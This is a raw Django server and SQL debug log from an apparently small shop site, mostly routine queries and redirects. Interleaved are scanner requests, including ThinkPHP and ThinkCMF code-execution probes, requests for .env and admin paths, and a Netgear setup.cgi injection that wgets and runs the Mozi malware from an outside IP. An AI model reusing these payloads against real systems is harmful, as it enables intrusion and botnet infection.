args=(9,) DEBUG 2019-12-30 09:33:22,148 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-30 09:33:22,150 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [30/Dec/2019 09:33:22] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [30/Dec/2019 09:33:24] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [30/Dec/2019 09:33:24] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [30/Dec/2019 09:36:59] "GET / HTTP/1.0" 302 0 [30/Dec/2019 09:39:16] "GET / HTTP/1.0" 302 0 [30/Dec/2019 09:42:17] "GET / HTTP/1.0" 302 0 [30/Dec/2019 09:47:20] "GET / HTTP/1.0" 302 0 [30/Dec/2019 09:52:38] "GET / HTTP/1.0" 302 0 [30/Dec/2019 10:00:01] "GET / HTTP/1.0" 302 0 [30/Dec/2019 10:01:23] "GET / HTTP/1.0" 302 0 [30/Dec/2019 10:04:03] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 Not Found: /index.php [30/Dec/2019 10:04:03] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 6454 DEBUG 2019-12-30 10:04:03,968 utils 2749 140297222735616 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'c9d84uuavevx9wklzbml52e3rfvm8p2m' LIMIT 1; args=('c9d84uuavevx9wklzbml52e3rfvm8p2m',) DEBUG 2019-12-30 10:04:03,970 utils 2749 140297222735616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('c9d84uuavevx9wklzbml52e3rfvm8p2m', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-13T10:04:03.969066+00:00'::timestamptz); args=('c9d84uuavevx9wklzbml52e3rfvm8p2m', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 13, 10, 4, 3, 969066, tzinfo=)) [30/Dec/2019 10:04:03] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [30/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 10:10:06] "GET / HTTP/1.0" 302 0 [30/Dec/2019 10:18:19] "GET / HTTP/1.0" 302 0 [30/Dec/2019 10:23:39] "GET / HTTP/1.0" 302 0 [30/Dec/2019 10:29:41] "GET / HTTP/1.0" 302 0 [30/Dec/2019 10:39:00] "GET / HTTP/1.0" 302 0 [30/Dec/2019 10:44:19] "GET / HTTP/1.0" 302 0 [30/Dec/2019 10:50:34] "GET / HTTP/1.0" 302 0 [30/Dec/2019 10:59:40] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:04:59] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:10:04] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:15:07] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:20:09] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:25:12] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:30:14] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [30/Dec/2019 11:30:39] "GET /robots.txt HTTP/1.0" 404 6341 [30/Dec/2019 11:30:44] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:38:40] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:43:42] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:45:34] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:48:45] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:53:47] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:58:50] "GET / HTTP/1.0" 302 0 [30/Dec/2019 11:59:02] "GET / HTTP/1.0" 302 0 [30/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 12:10:06] "GET / HTTP/1.0" 302 0 [30/Dec/2019 12:15:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 12:20:11] "GET / HTTP/1.0" 302 0 [30/Dec/2019 12:27:07] "GET / HTTP/1.0" 302 0 [30/Dec/2019 12:28:38] "GET / HTTP/1.0" 302 0 [30/Dec/2019 12:32:09] "GET / HTTP/1.0" 302 0 [30/Dec/2019 12:37:12] "GET / HTTP/1.0" 302 0 [30/Dec/2019 12:42:15] "GET / HTTP/1.0" 302 0 [30/Dec/2019 12:44:08] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-30 12:44:08,273 utils 2749 140297222735616 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mkzk7ive7xeni2ordxuj7s049kcmpxhl' LIMIT 1; args=('mkzk7ive7xeni2ordxuj7s049kcmpxhl',) DEBUG 2019-12-30 12:44:08,275 utils 2749 140297222735616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mkzk7ive7xeni2ordxuj7s049kcmpxhl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-13T12:44:08.273848+00:00'::timestamptz); args=('mkzk7ive7xeni2ordxuj7s049kcmpxhl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 13, 12, 44, 8, 273848, tzinfo=)) [30/Dec/2019 12:44:08] "GET /login/?next=/ HTTP/1.0" 200 1786 [30/Dec/2019 12:47:17] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [30/Dec/2019 12:52:12] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [30/Dec/2019 12:52:13] "GET /dyzl/Print.asp?ArticleID=347 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [30/Dec/2019 12:52:15] "GET /xyzx/SendMail.asp?ArticleID=344 HTTP/1.0" 404 6376 [30/Dec/2019 12:52:20] "GET / HTTP/1.0" 302 0 [30/Dec/2019 12:57:23] "GET / HTTP/1.0" 302 0 [30/Dec/2019 13:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [30/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 13:10:05] "GET / HTTP/1.0" 302 0 [30/Dec/2019 13:15:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 13:20:11] "GET / HTTP/1.0" 302 0 [30/Dec/2019 13:25:13] "GET / HTTP/1.0" 302 0 [30/Dec/2019 13:30:16] "GET / HTTP/1.0" 302 0 [30/Dec/2019 13:35:19] "GET / HTTP/1.0" 302 0 [30/Dec/2019 13:45:19] "GET / HTTP/1.0" 302 0 [30/Dec/2019 13:50:22] "GET / HTTP/1.0" 302 0 Not Found: /solr/admin/info/system [30/Dec/2019 13:50:27] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 6384 [30/Dec/2019 13:55:24] "GET / HTTP/1.0" 302 0 [30/Dec/2019 14:04:31] "GET / HTTP/1.0" 302 0 [30/Dec/2019 14:05:02] "GET / HTTP/1.0" 302 0 [30/Dec/2019 14:10:05] "GET / HTTP/1.0" 302 0 [30/Dec/2019 14:15:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 14:24:15] "GET / HTTP/1.0" 302 0 [30/Dec/2019 14:29:58] "GET / HTTP/1.0" 302 0 [30/Dec/2019 14:35:00] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [30/Dec/2019 14:35:42] "GET /proxy.php HTTP/1.0" 404 6346 [30/Dec/2019 14:40:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 14:45:06] "GET / HTTP/1.0" 302 0 [30/Dec/2019 14:50:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 14:55:11] "GET / HTTP/1.0" 302 0 [30/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 15:10:05] "GET / HTTP/1.0" 302 0 [30/Dec/2019 15:15:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 15:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [30/Dec/2019 15:20:11] "GET / HTTP/1.0" 302 0 [30/Dec/2019 15:26:15] "GET / HTTP/1.0" 302 0 [30/Dec/2019 15:31:18] "GET / HTTP/1.0" 302 0 [30/Dec/2019 15:34:14] "HEAD / HTTP/1.0" 302 0 [30/Dec/2019 15:37:18] "GET / HTTP/1.0" 302 0 [30/Dec/2019 15:42:21] "GET / HTTP/1.0" 302 0 [30/Dec/2019 15:47:22] "GET / HTTP/1.0" 302 0 [30/Dec/2019 15:52:46] "GET / HTTP/1.0" 302 0 [30/Dec/2019 15:54:32] "HEAD / HTTP/1.0" 302 0 [30/Dec/2019 15:55:34] "GET / HTTP/1.0" 302 0 [30/Dec/2019 15:58:15] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [30/Dec/2019 16:00:53] "GET /wp-login.php HTTP/1.0" 404 6348 [30/Dec/2019 16:01:01] "HEAD / HTTP/1.0" 302 0 [30/Dec/2019 16:03:44] "GET / HTTP/1.0" 302 0 [30/Dec/2019 16:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [30/Dec/2019 16:09:16] "GET / HTTP/1.0" 302 0 [30/Dec/2019 16:14:45] "GET / HTTP/1.0" 302 0 [30/Dec/2019 16:22:53] "HEAD / HTTP/1.0" 302 0 [30/Dec/2019 16:23:42] "GET / HTTP/1.0" 302 0 [30/Dec/2019 16:28:45] "GET / HTTP/1.0" 302 0 [30/Dec/2019 16:33:48] "GET / HTTP/1.0" 302 0 [30/Dec/2019 16:38:50] "GET / HTTP/1.0" 302 0 [30/Dec/2019 16:43:53] "GET / HTTP/1.0" 302 0 [30/Dec/2019 16:48:55] "GET / HTTP/1.0" 302 0 [30/Dec/2019 16:53:58] "GET / HTTP/1.0" 302 0 [30/Dec/2019 16:59:01] "GET / HTTP/1.0" 302 0 [30/Dec/2019 17:05:02] "GET / HTTP/1.0" 302 0 [30/Dec/2019 17:10:05] "GET / HTTP/1.0" 302 0 Not Found: /solr/admin/info/system [30/Dec/2019 17:11:36] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 6384 [30/Dec/2019 17:15:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 17:17:16] "GET / HTTP/1.0" 302 0 [30/Dec/2019 17:20:24] "GET / HTTP/1.0" 302 0 [30/Dec/2019 17:26:11] "GET / HTTP/1.0" 302 0 [30/Dec/2019 17:31:13] "GET / HTTP/1.0" 302 0 [30/Dec/2019 17:36:16] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [30/Dec/2019 17:37:59] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [30/Dec/2019 17:38:00] "GET /dyzl/Print.asp?ArticleID=318 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [30/Dec/2019 17:38:02] "GET /xyzx/SendMail.asp?ArticleID=348 HTTP/1.0" 404 6376 [30/Dec/2019 17:41:19] "GET / HTTP/1.0" 302 0 [30/Dec/2019 17:46:21] "GET / HTTP/1.0" 302 0 [30/Dec/2019 17:51:24] "GET / HTTP/1.0" 302 0 [30/Dec/2019 17:56:27] "GET / HTTP/1.0" 302 0 [30/Dec/2019 18:01:45] "GET / HTTP/1.0" 302 0 [30/Dec/2019 18:08:40] "GET / HTTP/1.0" 302 0 [30/Dec/2019 18:13:43] "GET / HTTP/1.0" 302 0 [30/Dec/2019 18:18:46] "GET / HTTP/1.0" 302 0 [30/Dec/2019 18:19:18] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 [30/Dec/2019 18:19:18] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 DEBUG 2019-12-30 18:19:19,009 utils 2749 140297222735616 (0.006) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '9fuuqyhtwxm0nm9rki30611bsij4cnlf' LIMIT 1; args=('9fuuqyhtwxm0nm9rki30611bsij4cnlf',) DEBUG 2019-12-30 18:19:19,012 utils 2749 140297222735616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('9fuuqyhtwxm0nm9rki30611bsij4cnlf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-13T18:19:19.010663+00:00'::timestamptz); args=('9fuuqyhtwxm0nm9rki30611bsij4cnlf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 13, 18, 19, 19, 10663, tzinfo=)) [30/Dec/2019 18:19:19] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 DEBUG 2019-12-30 18:19:19,135 utils 2749 140297222735616 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'nt8vm6eg3ybmiu6re2ou03g5gxy23b98' LIMIT 1; args=('nt8vm6eg3ybmiu6re2ou03g5gxy23b98',) DEBUG 2019-12-30 18:19:19,138 utils 2749 140297222735616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('nt8vm6eg3ybmiu6re2ou03g5gxy23b98', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-13T18:19:19.136480+00:00'::timestamptz); args=('nt8vm6eg3ybmiu6re2ou03g5gxy23b98', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 13, 18, 19, 19, 136480, tzinfo=)) [30/Dec/2019 18:19:19] "GET /login/?next=/%3Fa%3Dfetch%26content%3D%253Cphp%253Edie%28%40md5%28HelloThinkCMF%29%29%253C/php%253E HTTP/1.0" 200 1936 [30/Dec/2019 18:20:02] "GET / HTTP/1.0" 302 0 [30/Dec/2019 18:23:48] "GET / HTTP/1.0" 302 0 Not Found: /.env [30/Dec/2019 18:24:59] "GET /.env HTTP/1.0" 404 6322 Not Found: /index.php [30/Dec/2019 18:26:11] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 6454 [30/Dec/2019 18:28:51] "GET / HTTP/1.0" 302 0 [30/Dec/2019 18:33:53] "GET / HTTP/1.0" 302 0 [30/Dec/2019 18:39:33] "GET / HTTP/1.0" 302 0 [30/Dec/2019 18:44:56] "GET / HTTP/1.0" 302 0 [30/Dec/2019 18:49:43] "GET / HTTP/1.0" 302 0 [30/Dec/2019 18:49:59] "GET / HTTP/1.0" 302 0 [30/Dec/2019 18:55:02] "GET / HTTP/1.0" 302 0 [30/Dec/2019 19:03:15] "GET / HTTP/1.0" 302 0 [30/Dec/2019 19:09:14] "GET / HTTP/1.0" 302 0 [30/Dec/2019 19:14:36] "GET / HTTP/1.0" 302 0 [30/Dec/2019 19:19:39] "GET / HTTP/1.0" 302 0 [30/Dec/2019 19:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [30/Dec/2019 19:28:56] "GET / HTTP/1.0" 302 0 [30/Dec/2019 19:33:58] "GET / HTTP/1.0" 302 0 [30/Dec/2019 19:39:01] "GET / HTTP/1.0" 302 0 [30/Dec/2019 19:45:38] "GET / HTTP/1.0" 302 0 [30/Dec/2019 19:50:48] "GET / HTTP/1.0" 302 0 [30/Dec/2019 19:55:56] "GET / HTTP/1.0" 302 0 Not Found: /setup.cgi [30/Dec/2019 20:00:09] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://221.210.211.21:42144/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 6506 [30/Dec/2019 20:01:05] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:06:13] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:11:22] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:16:32] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:21:43] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:26:53] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:32:02] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:37:12] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:42:21] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:47:31] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:48:55] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:52:18] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:52:40] "GET / HTTP/1.0" 302 0 [30/Dec/2019 20:57:50] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-30 21:01:01,470 utils 2749 140297222735616 (0.009) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-30 21:01:01,482 utils 2749 140297222735616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-30 21:01:01,487 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-30 21:01:01,491 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-30 21:01:01,497 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-30 21:01:01,500 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-30 21:01:01,503 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-30 21:01:01,505 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-30 21:01:01,508 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-30 21:01:01,512 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-30 21:01:01,515 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-30 21:01:01,517 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-30 21:01:01,520 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-30 21:01:01,523 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-30 21:01:01,527 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-30 21:01:01,530 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-30 21:01:01,532 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-30 21:01:01,534 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-30 21:01:01,537 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-30 21:01:01,541 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-30 21:01:01,544 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-30 21:01:01,546 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-30 21:01:01,549 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-30 21:01:01,552 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-30 21:01:01,554 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-30 21:01:01,560 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-30 21:01:01,565 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-30 21:01:01,569 utils 2749 